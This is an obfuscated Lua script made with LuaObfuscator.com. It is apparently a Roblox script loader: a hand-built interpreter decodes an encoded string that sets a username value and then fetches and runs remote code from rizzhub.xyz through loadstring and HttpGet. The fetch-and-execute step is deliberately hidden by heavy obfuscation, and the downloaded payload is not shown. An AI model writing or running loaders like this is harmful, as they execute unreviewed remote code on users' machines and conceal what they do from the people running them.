--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do
	local v0 = tonumber;
	local v1 = string.byte;
	local v2 = string.char;
	local v3 = string.sub;
	local v4 = string.gsub;
	local v5 = string.rep;
	local v6 = table.concat;
	local v7 = table.insert;
	local v8 = math.ldexp;
	local v9 = getfenv or function()
		return _ENV;
	end;
	local v10 = setmetatable;
	local v11 = pcall;
	local v12 = select;
	local v13 = unpack or table.unpack;
	local v14 = tonumber;
	local function v15(v16, v17, ...)
		local v18 = 1;
		local v19;
		v16 = v4(v3(v16, 5), "..", function(v30)
			if (v1(v30, 2) == 79) then
				local v72 = 0;
				while true do
					if (0 == v72) then
						v19 = v0(v3(v30, 1, 1));
						return "";
					end
				end
			else
				local v73 = v2(v0(v30, 16));
				if v19 then
					local v92 = v5(v73, v19);
					v19 = nil;
					return v92;
				else
					return v73;
				end
			end
		end);
		local function v20(v31, v32, v33)
			if v33 then
				local v74 = 0;
				local v75;
				while true do
					if (v74 == (0 - 0)) then
						v75 = (v31 / ((1485 - (939 + 544)) ^ (v32 - (4 - (1 + 2))))) % ((861 - (461 + 398)) ^ (((v33 - (1 + 0)) - (v32 - (723 - (139 + 583)))) + 1 + 0));
						return v75 - (v75 % (1488 - (691 + 796)));
					end
				end
			else
				local v76 = 0 + 0;
				local v77;
				while true do
					if (v76 == 0) then
						v77 = (2 - 0) ^ (v32 - (1711 - (1184 + 526)));
						return (((v31 % (v77 + v77)) >= v77) and (1 + 0)) or (0 + 0);
					end
				end
			end
		end
		local function v21()
			local v34 = 0 - 0;
			local v35;
			while true do
				if (v34 == (1 + 0)) then
					return v35;
				end
				if (v34 == ((74 + 1287) - (995 + 366))) then
					v35 = v1(v16, v18, v18);
					v18 = v18 + (849 - (326 + 522));
					v34 = 1 + 0;
				end
			end
		end
		local function v22()
			local v36, v37 = v1(v16, v18, v18 + (2 - 0));
			v18 = v18 + 2;
			return (v37 * (82 + 174)) + v36;
		end
		local function v23()
			local v38, v39, v40, v41 = v1(v16, v18, v18 + 1 + 2);
			v18 = v18 + 3 + 1;
			return (v41 * (5233461 + 11543755)) + (v40 * (113767 - 48231)) + (v39 * ((393 + 153) - (1870 - (1029 + 551)))) + v38;
		end
		local function v24()
			local v42 = v23();
			local v43 = v23();
			local v44 = (1536 - 874) - (215 + 356 + 90);
			local v45 = (v20(v43, 1186 - (285 + 900), 20) * ((2 + 0) ^ 32)) + v42;
			local v46 = v20(v43, 39 - (52 - 34), 84 - 53);
			local v47 = ((v20(v43, 2 + 30) == (20 - ((38 - 21) + 2))) and -(1 - 0)) or (928 - (345 + (2142 - (1089 + 471))));
			if (v46 == (1017 - ((1562 - 663) + 118))) then
				if (v45 == (0 - 0)) then
					return v47 * (1668 - (1313 + 355));
				else
					v46 = 1;
					v44 = 0 - 0;
				end
			elseif (v46 == (866 + 1181)) then
				return ((v45 == 0) and (v47 * ((1 + (0 - 0)) / (70 - (4 + 13 + 53))))) or (v47 * NaN);
			end
			return v8(v47, v46 - (1492 - 469)) * (v44 + (v45 / ((2 + 0) ^ (68 - 16))));
		end
		local function v25(v48)
			local v49;
			if not v48 then
				v48 = v23();
				if (v48 == (739 - (493 + 246))) then
					return "";
				end
			end
			v49 = v3(v16, v18, (v18 + v48) - (1 - 0));
			v18 = v18 + v48;
			local v50 = {};
			for v65 = 2 - 1, #v49 do
				v50[v65] = v2(v1(v3(v49, v65, v65)));
			end
			return v6(v50);
		end
		local v26 = v23;
		local function v27(...)
			return {...}, v12("#", ...);
		end
		local function v28()
			local v51 = 0;
			local v52;
			local v53;
			local v54;
			local v55;
			local v56;
			local v57;
			local v58;
			while true do
				if (0 == v51) then
					v52 = 0 + 0;
					v53 = nil;
					v51 = 109 - (69 + 39);
				end
				if (v51 == 3) then
					v58 = nil;
					while true do
						local v93 = 0;
						local v94;
						while true do
							if (v93 ~= (107 - (83 + 24))) then
							else
								v94 = 0 - 0;
								while true do
									if ((0 + 0) == v94) then
										local v100 = 0 - 0;
										while true do
											if (v100 == 1) then
												v94 = 1;
												break;
											end
											if ((0 - 0) ~= v100) then
											else
												if (1 ~= v52) then
												else
													local v105 = 0;
													while true do
														if (v105 == 2) then
															v52 = 2;
															break;
														end
														if (v105 ~= 0) then
														else
															v57 = v23();
															v58 = {};
															v105 = 1 + 0;
														end
														if (v105 == (1 + 0)) then
															for v134 = 1, v57 do
																local v135 = 0;
																local v136;
																local v137;
																local v138;
																local v139;
																while true do
																	if ((9 - 7) == v135) then
																		while true do
																			if (v136 ~= 0) then
																			else
																				local v150 = 0;
																				while true do
																					if (v150 ~= (1 + 0)) then
																					else
																						v136 = 1;
																						break;
																					end
																					if ((0 + 0) == v150) then
																						v137 = 0 + 0;
																						v138 = nil;
																						v150 = 1;
																					end
																				end
																			end
																			if (v136 == 1) then
																				v139 = nil;
																				while true do
																					if (v137 == (1669 - (1007 + 662))) then
																						local v169 = 0 - 0;
																						local v170;
																						local v171;
																						while true do
																							if (v169 ~= (411 - (345 + 65))) then
																							else
																								while true do
																									if (v170 == 0) then
																										v171 = 824 - (299 + 525);
																										while true do
																											if (v171 == 1) then
																												v137 = 3 - 2;
																												break;
																											end
																											if (v171 == 0) then
																												local v188 = 0 - 0;
																												local v189;
																												while true do
																													if (v188 ~= (0 - 0)) then
																													else
																														v189 = 0;
																														while true do
																															if ((0 + 0) == v189) then
																																v138 = v21();
																																v139 = nil;
																																v189 = 1;
																															end
																															if (v189 ~= (1 - 0)) then
																															else
																																v171 = 1;
																																break;
																															end
																														end
																														break;
																													end
																												end
																											end
																										end
																										break;
																									end
																								end
																								break;
																							end
																							if (v169 ~= (0 - 0)) then
																							else
																								v170 = 791 - (515 + 276);
																								v171 = nil;
																								v169 = 1199 - (36 + 1162);
																							end
																						end
																					end
																					if (v137 == (1 + 0)) then
																						if (v138 == 1) then
																							v139 = v21() ~= (1756 - (608 + 1148));
																						elseif (v138 == (3 - 1)) then
																							v139 = v24();
																						elseif (v138 == 3) then
																							v139 = v25();
																						end
																						v58[v134] = v139;
																						break;
																					end
																				end
																				break;
																			end
																		end
																		break;
																	end
																	if (v135 ~= 0) then
																	else
																		v136 = 0;
																		v137 = nil;
																		v135 = 1164 - (840 + 323);
																	end
																	if (v135 ~= (294 - (55 + 238))) then
																	else
																		v138 = nil;
																		v139 = nil;
																		v135 = 2;
																	end
																end
															end
															v56[4 - 1] = v21();
															v105 = 4 - 2;
														end
													end
												end
												if (v52 == 0) then
													local v106 = 1325 - (850 + 475);
													local v107;
													while true do
														if (v106 == 0) then
															v107 = 0;
															while true do
																if (v107 == (1615 - (938 + 677))) then
																	local v140 = 0;
																	while true do
																		if ((0 - 0) ~= v140) then
																		else
																			v53 = {};
																			v54 = {};
																			v140 = 1;
																		end
																		if (v140 == 1) then
																			v107 = 1;
																			break;
																		end
																	end
																end
																if (v107 ~= (7 - 5)) then
																else
																	v52 = 1;
																	break;
																end
																if (v107 ~= (1 + 0)) then
																else
																	local v141 = 0 - 0;
																	while true do
																		if (v141 ~= (0 - 0)) then
																		else
																			v55 = {};
																			v56 = {v53,v54,nil,v55};
																			v141 = 2 - 1;
																		end
																		if (v141 == (1089 - (590 + 498))) then
																			v107 = 1 + 1;
																			break;
																		end
																	end
																end
															end
															break;
														end
													end
												end
												v100 = 978 - (488 + 489);
											end
										end
									end
									if (v94 == (3 - 2)) then
										if (v52 == 2) then
											local v101 = 0;
											local v102;
											while true do
												if (v101 == (1948 - (1584 + 364))) then
													v102 = 0;
													while true do
														local v110 = 0;
														while true do
															if (v110 == 0) then
																if (v102 ~= (1 + 0)) then
																else
																	local v142 = 0 + 0;
																	while true do
																		if ((0 + 0) == v142) then
																			for v151 = 1582 - (605 + 976), v23() do
																				v55[v151] = v23();
																			end
																			return v56;
																		end
																	end
																end
																if (v102 == 0) then
																	local v143 = 0 - 0;
																	while true do
																		if (v143 ~= (0 - 0)) then
																		else
																			for v153 = 1 - 0, v23() do
																				local v154 = 1626 - (1600 + 26);
																				local v155;
																				while true do
																					if (v154 ~= 0) then
																					else
																						v155 = v21();
																						if (v20(v155, 1 + 0, 1) == (0 - 0)) then
																							local v174 = 0;
																							local v175;
																							local v176;
																							local v177;
																							local v178;
																							local v179;
																							while true do
																								if (v174 ~= 0) then
																								else
																									local v181 = 0 + 0;
																									while true do
																										if (v181 == 1) then
																											v174 = 833 - (120 + 712);
																											break;
																										end
																										if (v181 == 0) then
																											v175 = 0;
																											v176 = nil;
																											v181 = 1;
																										end
																									end
																								end
																								if (v174 == 1) then
																									local v182 = 0;
																									while true do
																										if (v182 == 0) then
																											v177 = nil;
																											v178 = nil;
																											v182 = 2 - 1;
																										end
																										if (v182 ~= (1719 - (1263 + 455))) then
																										else
																											v174 = 2 + 0;
																											break;
																										end
																									end
																								end
																								if (v174 ~= (7 - 5)) then
																								else
																									v179 = nil;
																									while true do
																										if (v175 == (0 - 0)) then
																											local v183 = 0;
																											while true do
																												if (v183 == 1) then
																													v175 = 1 + 0;
																													break;
																												end
																												if (v183 ~= 0) then
																												else
																													v176 = 473 - (332 + 141);
																													v177 = nil;
																													v183 = 1;
																												end
																											end
																										end
																										if (v175 == (1 + 0)) then
																											local v184 = 0;
																											local v185;
																											while true do
																												if (0 == v184) then
																													v185 = 1865 - (1244 + 621);
																													while true do
																														if (v185 == (1074 - (790 + 283))) then
																															v175 = 1 + 1;
																															break;
																														end
																														if (v185 == (0 + 0)) then
																															local v198 = 0;
																															while true do
																																if (v198 == (1538 - (1442 + 95))) then
																																	v185 = 1;
																																	break;
																																end
																																if (v198 == (0 + 0)) then
																																	v178 = nil;
																																	v179 = nil;
																																	v198 = 1;
																																end
																															end
																														end
																													end
																													break;
																												end
																											end
																										end
																										if (v175 == 2) then
																											while true do
																												if (v176 == (0 - 0)) then
																													local v190 = 459 - (118 + 341);
																													while true do
																														if (v190 == 1) then
																															v176 = 1 + 0;
																															break;
																														end
																														if (v190 ~= (0 + 0)) then
																														else
																															v177 = v20(v155, 2 + 0, 3);
																															v178 = v20(v155, 4, 6);
																															v190 = 1;
																														end
																													end
																												end
																												if (v176 ~= (1521 - (989 + 531))) then
																												else
																													local v191 = 0;
																													local v192;
																													while true do
																														if (v191 == 0) then
																															v192 = 0;
																															while true do
																																if (v192 == (2 - 1)) then
																																	v176 = 571 - (443 + 126);
																																	break;
																																end
																																if (v192 ~= (570 - (143 + 427))) then
																																else
																																	v179 = {v22(),v22(),nil,nil};
																																	if (v177 == (0 + 0)) then
																																		local v200 = 0 - 0;
																																		local v201;
																																		while true do
																																			if (v200 ~= 0) then
																																			else
																																				v201 = 0 - 0;
																																				while true do
																																					if (v201 == 0) then
																																						v179[3] = v22();
																																						v179[1 + 3] = v22();
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	elseif (v177 == 1) then
																																		v179[1642 - (129 + 1510)] = v23();
																																	elseif (v177 == (1 + 1)) then
																																		v179[3] = v23() - ((2 - 0) ^ (240 - (38 + 186)));
																																	elseif (v177 == (1534 - (726 + 805))) then
																																		local v210 = 0;
																																		local v211;
																																		local v212;
																																		while true do
																																			if (v210 == 0) then
																																				v211 = 0;
																																				v212 = nil;
																																				v210 = 1;
																																			end
																																			if (v210 == 1) then
																																				while true do
																																					if (0 == v211) then
																																						v212 = 0;
																																						while true do
																																							if (v212 == (0 + 0)) then
																																								v179[6 - 3] = v23() - (2 ^ (5 + 11));
																																								v179[834 - (195 + 635)] = v22();
																																								break;
																																							end
																																						end
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	end
																																	v192 = 1 + 0;
																																end
																															end
																															break;
																														end
																													end
																												end
																												if (2 ~= v176) then
																												else
																													local v193 = 0 + 0;
																													local v194;
																													while true do
																														if (v193 == (0 - 0)) then
																															v194 = 0;
																															while true do
																																if (v194 == (857 - (502 + 355))) then
																																	local v199 = 0 + 0;
																																	while true do
																																		if ((1364 - (1164 + 199)) == v199) then
																																			v194 = 1;
																																			break;
																																		end
																																		if (v199 == 0) then
																																			if (v20(v178, 1 + 0, 3 - 2) ~= 1) then
																																			else
																																				v179[4 - 2] = v58[v179[2 - 0]];
																																			end
																																			if (v20(v178, 2 + 0, 2 + 0) ~= 1) then
																																			else
																																				v179[8 - 5] = v58[v179[3]];
																																			end
																																			v199 = 661 - (161 + 499);
																																		end
																																	end
																																end
																																if (v194 == 1) then
																																	v176 = 129 - (47 + 79);
																																	break;
																																end
																															end
																															break;
																														end
																													end
																												end
																												if (v176 ~= 3) then
																												else
																													if (v20(v178, 3, 259 - (131 + 125)) == 1) then
																														v179[4] = v58[v179[4]];
																													end
																													v53[v153] = v179;
																													break;
																												end
																											end
																											break;
																										end
																									end
																									break;
																								end
																							end
																						end
																						break;
																					end
																				end
																			end
																			for v156 = 1 - 0, v23() do
																				v54[v156 - (2 - 1)] = v28();
																			end
																			v143 = 1178 - (863 + 314);
																		end
																		if (v143 ~= (1087 - (634 + 452))) then
																		else
																			v102 = 1 + 0;
																			break;
																		end
																	end
																end
																break;
															end
														end
													end
													break;
												end
											end
										end
										break;
									end
								end
								break;
							end
						end
					end
					break;
				end
				if (v51 == (1 + 0)) then
					v54 = nil;
					v55 = nil;
					v51 = 2;
				end
				if ((2 + 0) == v51) then
					v56 = nil;
					v57 = nil;
					v51 = 3;
				end
			end
		end
		local function v29(v59, v60, v61)
			local v62 = v59[1];
			local v63 = v59[2];
			local v64 = v59[3];
			return function(...)
				local v67 = 1;
				local v68 = -1;
				local v69 = {...};
				local v70 = v12("#", ...) - 1;
				local function v71()
					local v78 = v62;
					local v79 = v63;
					local v80 = v64;
					local v81 = v27;
					local v82 = {};
					local v83 = {};
					local v84 = {};
					for v88 = 272 - (116 + 156), v70 do
						if (((7208 - 4770) > (2207 - (1332 + 374))) and (v88 >= v80)) then
							v82[v88 - v80] = v69[v88 + (1 - 0)];
						else
							v84[v88] = v69[v88 + (1683 - (1273 + 409))];
						end
					end
					local v85 = (v70 - v80) + 1 + 0;
					local v86;
					local v87;
					while true do
						local v89 = 558 - (299 + 259);
						local v90;
						while true do
							if (((1 + 3218) > (445 + 117 + 170)) and (v89 == (0 - 0))) then
								v90 = 0 + 0;
								while true do
									if (((0 - 0) == v90) or (930 == (31 + 226))) then
										local v99 = 1165 - (988 + 177);
										while true do
											if ((v99 == (0 + 0)) or (((11173 - (1162 + 818)) - 5512) < (802 + 1885))) then
												v86 = v78[v67];
												v87 = v86[537 - (56 + 480)];
												v99 = 1 + 0;
											end
											if ((((16025 - 12251) - (32 + 126)) < (16770 - 12857)) and (v99 == (3 - 2))) then
												v90 = 1 - 0;
												break;
											end
										end
									end
									if ((v90 == (1 + 0)) or ((4399 - (953 + 590)) == 364)) then
										if ((v87 <= (454 - (20 + 430))) or (((3471 - (600 + 206)) + 699) == 4231)) then
											if (((5130 - ((588 - (80 + 318)) + 11)) > (4878 - ((599 - 399) + 279))) and (v87 <= (2 - 1))) then
												if ((731 <= (1524 + 648)) and (v87 == (0 + 0))) then
													v84[v86[1542 - (13 + 820 + 707)]]();
												else
													v67 = v86[1 + 2];
												end
											elseif ((v87 <= (1737 - (16 + 1719))) or ((226 + (2128 - 644)) > (18099 - 13925))) then
												do
													return;
												end
											elseif ((v87 == ((2649 - 1682) - (292 + 672))) or ((1655 - ((46 - 35) + 69)) >= (4404 - (978 + 911)))) then
												v61[v86[(1138 - 550) - (126 + 459)]] = v84[v86[4 - 2]];
											else
												local v113 = 0 - 0;
												local v114;
												local v115;
												local v116;
												while true do
													if ((v113 == (0 + 0)) or (((2004 - 901) + 163) > (4956 - (999 + (470 - 162))))) then
														v114 = 0 - 0;
														v115 = nil;
														v113 = 1;
													end
													if ((v113 == (219 - (126 + 92))) or ((3674 - (763 + 344)) <= (2392 + 21))) then
														v116 = nil;
														while true do
															if ((v114 == (0 + 0)) or ((1372 + 669) >= (815 + 1546))) then
																local v144 = 0 - 0;
																while true do
																	if ((v144 == (1898 - (821 + 1076))) or ((1326 + 3036) <= (4532 - (1416 + 163)))) then
																		v114 = 3 - 2;
																		break;
																	end
																	if (((4774 - (1107 + 332)) >= (2409 - (121 + 38))) and (v144 == 0)) then
																		v115 = v86[2 + 0 + 0];
																		v116 = v84[v86[11 - 8]];
																		v144 = 1102 - (987 + 114);
																	end
																end
															end
															if (((1206 + 2420) <= (5734 - 1950)) and (v114 == (1 + 0))) then
																v84[v115 + (56 - (14 + 41))] = v116;
																v84[v115] = v116[v86[4]];
																break;
															end
														end
														break;
													end
												end
											end
										elseif (((14224 - 9422) >= (3081 + 1087)) and (v87 <= (983 - (535 + (1165 - 724))))) then
											if ((((13720 - 8993) - (31 + 247)) == ((20181 - 7476) - (7520 + 736))) and (v87 <= (3 + 2))) then
												v84[v86[1 + 1]] = v86[1176 - (210 + 963)] ~= (1410 - (53 + 1357));
											elseif (((2280 + 44) == 2324) and (v87 == (18 - (451 - (244 + 195))))) then
												local v117 = 0 + 0;
												local v118;
												local v119;
												local v120;
												local v121;
												local v122;
												local v123;
												while true do
													if ((v117 == (1229 - (142 + 1087))) or ((3224 - (118 + 652)) >= (3249 + 937))) then
														v118 = (0 + 0) - 0;
														v119 = nil;
														v117 = 1 + 0;
													end
													if ((v117 == (2 - 1)) or ((3717 - (323 + 832)) < (961 + 22))) then
														v120 = nil;
														v121 = nil;
														v117 = 7 - (1472 - (751 + 716));
													end
													if (((2127 + 2264) >= (1736 + 2321)) and (v117 == (4 - 2))) then
														v122 = nil;
														v123 = nil;
														v117 = 1503 - (473 + 692 + 335);
													end
													if ((v117 == (905 - (718 + 184))) or ((2944 - (1120 + 558)) >= (7615 - 4249))) then
														while true do
															if ((v118 == (552 - (124 + 30 + 398))) or ((2740 - (810 + 124)) > ((10425 - (202 + 909)) - 6933))) then
																v119 = 895 - (717 + 178);
																v120 = nil;
																v118 = 1637 - (145 + 1491);
															end
															if ((v118 == (293 - (124 + 167))) or ((4593 - 2902) > (1118 + 385 + 595))) then
																v123 = nil;
																while true do
																	if (((5087 - (12 + 618)) > (5251 - 3729)) and (v119 == (1 + 0))) then
																		local v160 = 1618 - (949 + 669);
																		local v161;
																		while true do
																			if (((2522 + 585) == (4191 - (687 + 397))) and (v160 == (0 - 0))) then
																				v161 = 0 + 0;
																				while true do
																					if ((v161 == (0 + 0)) or ((3368 - (598 + 6)) >= (13822 - 9137))) then
																						local v180 = 1925 - (585 + 1340);
																						while true do
																							if (((1043 - (856 + 187)) == v180) or ((2281 - 1356) > (12846 - 9357))) then
																								v68 = (v122 + v120) - ((586 - (35 + 550)) + 0);
																								v123 = 818 - (46 + 567 + 178 + 27);
																								v180 = 1 + 0;
																							end
																							if ((v180 == (3 - (1662 - (653 + 1007)))) or ((7867 - (5678 - (432 + 364))) > (1852 + 2258))) then
																								v161 = 1 + 0;
																								break;
																							end
																						end
																					end
																					if ((v161 == (2 - 1)) or ((1823 + 479) >= (1859 + 1240))) then
																						v119 = (3 + 0) - 1;
																						break;
																					end
																				end
																				break;
																			end
																		end
																	end
																	if (((105 + 29) < (3190 - (55 + 78))) and (v119 == (2 - (0 + 0)))) then
																		for v165 = v120, v68 do
																			local v166 = 0 + 0;
																			local v167;
																			local v168;
																			while true do
																				if ((v166 == (2 - 1)) or ((4283 + 544) == (13203 - 9280))) then
																					while true do
																						if (((2355 - (44 + 68)) <= (4736 - (687 + 186))) and (v167 == (0 - 0))) then
																							v168 = 420 - (56 + 364);
																							while true do
																								if (((1435 + 767) == (1143 + (1573 - 514))) and (v168 == ((693 - 177) - (386 + 130)))) then
																									v123 = v123 + (1023 - (938 + 84));
																									v84[v165] = v121[v123];
																									break;
																								end
																							end
																							break;
																						end
																					end
																					break;
																				end
																				if ((v166 == (0 - 0)) or ((5143 - (978 + 172)) <= ((4156 - 2035) - (578 + 435)))) then
																					v167 = 981 - (489 + 492);
																					v168 = nil;
																					v166 = 496 - (67 + 428);
																				end
																			end
																		end
																		break;
																	end
																	if ((v119 == (0 - 0)) or ((3035 + 1525) < (259 + 2657))) then
																		local v162 = 0 + 0;
																		while true do
																			if (((5326 - (162 + (2377 - 1331))) == (3472 + 646)) and (v162 == (562 - (440 + 122)))) then
																				v120 = v86[15 - ((737 - (291 + 442)) + 9)];
																				v121, v122 = v81(v84[v120](v13(v84, v120 + 1, v86[3 + 0])));
																				v162 = 1 + 0;
																			end
																			if ((2990 <= (3890 - (364 + 292))) and (v162 == (1 + 0))) then
																				v119 = 2 - 1;
																				break;
																			end
																		end
																	end
																end
																break;
															end
															if ((v118 == (3 - 2)) or (894 > (13597 - 9505))) then
																local v148 = 0 - 0;
																while true do
																	if (((2 - 1) == v148) or ((333 + 2943) > (5687 - (503 + 640)))) then
																		v118 = 4 - 2;
																		break;
																	end
																	if (((1189 + 654) == (1988 - (102 + 43))) and (v148 == (0 - 0))) then
																		v121 = nil;
																		v122 = nil;
																		v148 = 1 - 0;
																	end
																end
															end
														end
														break;
													end
												end
											else
												v84[v86[9 - 7]] = v86[1 + 2];
											end
										elseif (((3514 - (908 + 830)) > (1567 - 282)) and (v87 <= (19 - 11))) then
											if (((6769 - 2963) >= (767 + 1189)) and (v84[v86[4 - 2]] == v86[1062 - (80 + 978)])) then
												v67 = v67 + 1 + 0;
											else
												v67 = v86[1 + 2];
											end
										elseif ((((7458 - 4962) - (209 + 233)) <= (994 + 2026)) and (v87 > 9)) then
											local v127 = 0 - 0;
											local v128;
											local v129;
											local v130;
											while true do
												if ((((0 - 0) + (0 - 0)) == v127) or ((6812 - 2361) <= (10246 - 6530))) then
													v128 = 0 - 0;
													v129 = nil;
													v127 = (4090 - 2537) - (696 + 856);
												end
												if (((4762 - (327 + 97)) < (3292 + 1107)) and (v127 == (346 - (87 + 258)))) then
													v130 = nil;
													while true do
														if ((v128 == (0 + 0)) or ((1385 + 854) == (8854 - 4218))) then
															local v149 = 0 - 0;
															while true do
																if ((v149 == (1 + 0)) or ((960 + 1835) <= (2591 - 731))) then
																	v128 = 1 + 0;
																	break;
																end
																if (((3159 - (25 + 198)) > (192 + 1025)) and ((0 + 0) == v149)) then
																	v129 = 0 + 0;
																	v130 = nil;
																	v149 = 1 + 0;
																end
															end
														end
														if (((81 + 44) < (2209 - (1138 + 544))) and (((2926 - (58 + 1444)) - (631 + 563 + 229)) == v128)) then
															while true do
																if (((1208 - (447 + (1991 - 1230))) == v129) or (((1220 + 1656) - (86 + 1542)) > (10760 - 8368))) then
																	v130 = v86[4 - 2];
																	v84[v130] = v84[v130](v13(v84, v130 + ((1405 - 768) - (502 + 134)), v68));
																	break;
																end
															end
															break;
														end
													end
													break;
												end
											end
										else
											v84[v86[(2 - 1) + 1]] = v61[v86[12 - 9]];
										end
										v67 = v67 + ((767 - (16 + 53)) - (96 + 601));
										break;
									end
								end
								break;
							end
						end
					end
				end
				A, B = v27(v11(v71));
				if not A[1] then
					local v91 = v59[4][v67] or "?";
					error("Script error at [" .. v91 .. "]:" .. A[2]);
				else
					return v13(A, 2, B);
				end
			end;
		end
		return v29(v28(), {}, v17)(...);
	end
	v15("LOL!073O00028O0003083O00557365724E616D6503123O00766963746F726368616E5F6F66696369616C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756100103O0012073O00013O0026083O0001000100010004013O00010001001207000100033O001203000100023O001209000100043O001209000200053O002004000200020006001207000400074O0005000500014O0006000200054O000A00013O00024O0001000100010004013O000F00010004013O000100012O00023O00017O00103O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00", v9(), ...);
end
